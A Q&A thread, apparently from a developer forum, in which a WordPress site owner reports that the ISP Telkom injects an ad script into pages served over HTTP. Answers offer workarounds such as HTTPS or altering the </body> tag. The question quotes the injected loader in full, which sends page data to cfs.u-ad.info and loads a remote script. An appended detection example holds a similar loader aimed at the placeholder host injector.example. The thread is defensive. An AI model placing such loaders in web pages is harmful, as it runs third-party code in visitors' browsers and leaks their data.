Reputation:
My website gets injected by a script like this:
<script>function netbro_cache_analytics(fn, callback) {setTimeout(function()
{fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var
idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r
= Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" +
"4TtHaUQnUEiP6K%2fc5C582Ltpw5OIinlRZ3f35Ig3RToKRLvWLwn6zEfnHRgrVr0WVf09gsyzoppB6HQ
lZs1%2bvVlaBJErvk4yTApvNxVRroJE3Sak6whXVhS8NtL5WQQ7xqk%2fl%2beEqRKsRzR0FuA%2bMRbKp
Tz%2fh8pwQUsZzPSHlUJaQ5eWnpe41LMxALmGAJ7wR93fB809%2b3BMdyLrPSeRjoat5eXfxM8hB8cF8FA
%2fADZ9XefsIT5mcIatvUYk00Cx89VQVB9oihM6lthSHZK76HYE2yVlBaqYl8N8lJpYpl3bTDK3nTOnpcZ
H07XEZDdhweI6oHkutA8rENrMv64HLRLfn%2fIH2yN7Q3C4Ly7sE6g9%2fkyUxZo0IvZ4NsUcBJwZ10Joo
9f63JGGYp%2bn8ZXG%2bI%2bHpuDri0qeXDPamxLkuhbs1gXAgx6ZSwZXm4940rBN97J6uiaXdZCyDo4ms
n2R%2f7i6CjiMCM66JMRM0RtI%2b4dRfZ2L78M%2bMB5T63xl0aYzBPpcoJFnNp75TozLX0wVNH7ZQLMIm
mchINjLEKPqXmlxC6kjQXWZiXrRa0nXtRY%2bUvCvz6huwCvSs3W8GNolSQ%3d%3d" +
"&idc_r="+idc_glo_r + "&domain="+document.domain +
"&sw="+screen.width+"&sh="+screen.height;var bsa =
document.createElement('script');bsa.type = 'text/javascript';bsa.async =
true;bsa.src = url;(document.getElementsByTagName('head')
[0]||document.getElementsByTagName('body')
[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){ });</script>
</body>
</html>
u-ad.info belongs to the company that manages my ISP (TELKOM). I have complained to them but it will never solve the problem. I'm using WordPress. How do I clean that script or block that script injection?
Upvotes: 4
Views: 4375
Reputation: 11
Updated: Telkom ISP already detects if </body></html> is inside a comment.
My solution: no </body></html> at all. Let the browser close the tag itself.
Already tested, and it worked as of December 2018.
Thank you
Upvotes: 1
Reputation: 11
There is a very simple method to prevent the script injection from working.
Just add this script right before the </body> tag.
<script>
//</body>
</script>
This image shows before and after use.
Before use:
After use:
If you use WordPress, just make sure you have installed a plugin that allows you to write that script in your footer section.
Just do this before ISP TELKOM knows.
Upvotes: 1
Reputation: 1
Use HTTPS (if provided by the server), or use a VPN/SSH tunneling/secure proxy, so all the problems will be cleaned up. The ISP injects the ads and analytics scripts by extracting all compression, injecting, and not compressing the data back. It will make an additional charge against your internet connection quota.
Upvotes: 0
Reputation: 1
Insert the code below in the head or at the end of the HTML.
<script type="text/javascript">
$(document).ready(function(){
$('body').append("</bo"+"dy>");
});
</script>
But make sure that your HTML code doesn't contain the </body> end tag and includes jQuery in your <head> tag.
Example:
Full HTML
<html>
<title>Foo bar</title>
<head></head>
<body>Lorem Ipsum</body>
</html>
becoming
<html>
<title>Foo bar</title>
<head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</head>
<body>Lorem Ipsum
<script type="text/javascript">
$(document).ready(function(){
$('body').append("</bo"+"dy>");
});
</script>
</html>
without the </body> end tag. The HTTP filter at the ISP will grep for </body> or </Body> or whatever <body> closing tag, then inject JavaScript code before the <body> closing tag so that their ads will appear on any website that uses the HTTP protocol.
Upvotes: -1
Reputation:
Based on my experience, you can use the HTTPS protocol or use this trick to avoid loading the script from your ISP :P
<!-- </body></html> -->
Add the code above, above your 'real' </body></html> tag. Let's do it!
Upvotes: 0
Reputation: 43
See my solution at http://www.kaskus.co.id/thread/5491671f0e8b46ff29000007/mengakali-script-injeksi-spidol-as-a-web-developer. Just change </body> to </Body>
Upvotes: 1
Reputation: 51
Change the body tag to uppercase.
My experiment shows that the script injector looks specifically for the presence of the body tag written in lower case. I'm not sure how long it will stay that way, though.
Upvotes: 1
Reputation: 2289
Bad ISP! :D
You cannot clean that script because it is injected when it passes through your ISP's server. You can only block it at the browser level. Read this: https://askubuntu.com/q/64303/224951. It's a pity that all your website visitors who use the same ISP will get the same injected page.
I think Google won't blacklist your site because certainly it is not using your ISP and thus doesn't see the injected script.
Upvotes: 3
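The last answer's point, that the script is added in transit and never exists on the server, can be checked by comparing the page as the server sends it with the copy a visitor receives over plain HTTP. The following is an added example, not part of any answer above; the sample pages, the host injector.example and the function names are constructed for illustration.

```javascript
// Constructed sample: the page as the origin server sends it.
const ORIGIN_HTML = `<html><head><script src="/js/app.js"></script></head>
<body>Lorem Ipsum</body></html>`;

// Constructed sample: the same page as received over plain HTTP, with an
// inline loader shaped like the one in the question placed before </body>.
// "injector.example" is a placeholder host, not a value from the page.
const INJECTED = `<script>var bsa = document.createElement('script');` +
  `bsa.src = "http://injector.example/request?domain=" + document.domain;` +
  `document.getElementsByTagName('head')[0].appendChild(bsa);</script>`;
const RECEIVED_HTML = ORIGIN_HTML.replace("</body>", () => INJECTED + "</body>");

// Every <script> element in the markup as {src, body}; tag case is ignored.
function listScripts(html) {
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script\s*>/gi;
  const scripts = [];
  for (const m of html.matchAll(re)) {
    const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(m[1]);
    scripts.push({ src: src ? src[1] : null, body: m[2].trim() });
  }
  return scripts;
}

// Scripts present in the received copy but absent from the origin copy.
function findInjectedScripts(originHtml, receivedHtml) {
  const key = (s) => JSON.stringify([s.src, s.body]);
  const known = new Set(listScripts(originHtml).map(key));
  return listScripts(receivedHtml).filter((s) => !known.has(key(s)));
}

// Hosts named by absolute or protocol-relative URLs in a script's src or body.
function referencedHosts(script) {
  const text = `${script.src || ""} ${script.body}`;
  const hosts = new Set();
  for (const m of text.matchAll(/(?:https?:)?\/\/([a-z0-9.-]+\.[a-z]{2,})/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return [...hosts];
}

const injected = findInjectedScripts(ORIGIN_HTML, RECEIVED_HTML);
console.log(injected.length, injected.flatMap(referencedHosts));
```

A host assembled from separate string pieces, as in the question's script, will not be picked up by referencedHosts, but the extra script block itself is still reported by findInjectedScripts.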